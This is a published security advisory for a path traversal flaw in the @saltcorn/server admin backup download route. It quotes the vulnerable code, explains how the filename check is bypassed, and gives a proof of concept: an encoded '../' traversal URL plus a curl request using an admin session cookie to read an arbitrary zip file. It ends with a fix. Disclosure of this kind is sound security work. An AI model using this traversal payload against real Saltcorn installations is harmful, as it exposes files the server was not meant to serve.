
GHSA-277h-px4m-62q8 @saltcorn/server

Package

Manager: npm
Name: @saltcorn/server
Vulnerable Version: >=0 <1.0.0-beta.14

Severity

Level: Medium

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

EPSS: N/A (percentile: N/A)

Details

@saltcorn/server arbitrary zip file read and download when downloading auto backups

### Summary

A user with admin permission can read and download arbitrary zip files when downloading auto backups. The file name used to identify the zip file is not properly sanitized before it is passed to the `res.download` API.

### Details

- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/admin.js#L671-L682

```js
router.get(
  "/auto-backup-download/:filename",
  isAdmin,
  error_catcher(async (req, res) => {
    const { filename } = req.params; // [1] source
    [...]
    if (
      !isRoot ||
      !(filename.startsWith(backup_file_prefix) && filename.endsWith(".zip")) // [2]
    ) {
      res.redirect("/admin/backup");
      return;
    }
    const auto_backup_directory = getState().getConfig("auto_backup_directory");
    res.download(path.join(auto_backup_directory, filename), filename); // [3] sink
  })
);
```

The check at [2] only inspects the beginning and end of the raw string, so a name such as `sc-backup-/../../tmp/secret.zip` satisfies it; `path.join` at [3] then collapses the `..` segments and the resulting path points outside `auto_backup_directory`.

### Steps to reproduce (PoC)

- create a file with the `.zip` extension under the `/tmp` folder:

```
echo "secret12345" > /tmp/secret.zip
```

- log into the application as an admin user
- visit the URL `http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip`
- download the zip file and then check that it was indeed downloaded:

```bash
cat secret.zip
secret12345
```

- Alternatively, send the following request to retrieve the file just created:

```bash
curl -i -X $'GET' \
  -H $'Host: localhost:3000' \
  -H $'Connection: close' \
  -b $'connect.sid=VALID_CONNECT_SID_COOKIE' \
  $'http://localhost:3000/admin/auto-backup-download/sc-backup-%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftmp%2fsecret.zip'
```

**NOTE**: To obtain a valid `connect.sid` cookie, open the developer console while logged in and retrieve the cookie value.

### Impact

Arbitrary zip file download (information disclosure).

### Recommended Mitigation

Resolve the `filename` parameter before checking whether it starts with `backup_file_prefix`.

Metadata

Created: 2024-10-03T19:46:12Z
Modified: 2024-10-03T19:46:12Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/10/GHSA-277h-px4m-62q8/GHSA-277h-px4m-62q8.json
CWE IDs: ["CWE-22"]
Alternative ID: N/A
Finding: F063
Auto approve: 1